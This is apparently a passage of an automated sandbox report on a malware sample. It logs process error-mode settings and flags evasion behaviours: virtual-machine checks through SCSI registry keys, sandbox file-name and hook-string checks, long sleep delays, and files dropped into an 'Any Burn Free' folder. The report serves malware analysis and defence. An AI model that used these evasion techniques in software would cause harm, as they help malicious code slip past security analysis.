                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\A6A0.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\Drivers\csrss.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\Drivers\csrss.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\Drivers\csrss.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\Drivers\csrss.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Checks if the current machine is a virtual machine (disk enumeration)
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\afratejKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\afratejKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\afratejKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\afratejKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\afratejKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\afratejKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DC49.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\AppData\Local\Temp\DC49.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\AppData\Local\Temp\DC49.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\AppData\Local\Temp\DC49.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\AppData\Local\Temp\DC49.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\AppData\Local\Temp\DC49.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Tries to detect sandboxes / dynamic malware analysis system (file name check)
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: \KnownDlls32\tESTAPp.ExE
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: ccQGH1mKws.exe, 00000001.00000002.1549896209.000000000051E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKK
                  Source: afratej, 00000006.00000002.1794010100.000000000071E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK/5J
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeMemory allocated: 3690000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeMemory allocated: 38C0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeMemory allocated: 3690000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeThread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 418Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 884Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 717Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1873Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 675Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 676Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeWindow / User API: threadDelayed 4020Jump to behavior
                  Source: C:\ProgramData\Drivers\csrss.exeWindow / User API: threadDelayed 6753
                  Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exeWindow / User API: threadDelayed 1299
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1674
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-30U3A.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-8B8M3.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\libwinpthread-1.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-MN9TN.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\libvorbisenc-2.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\zlib1.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-IGFK1.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\avformat-58.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\avutil-56.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-37AOI.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-UA7KG.tmp\_isetup\_iscrypt.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-VTCPG.tmpJump to dropped file
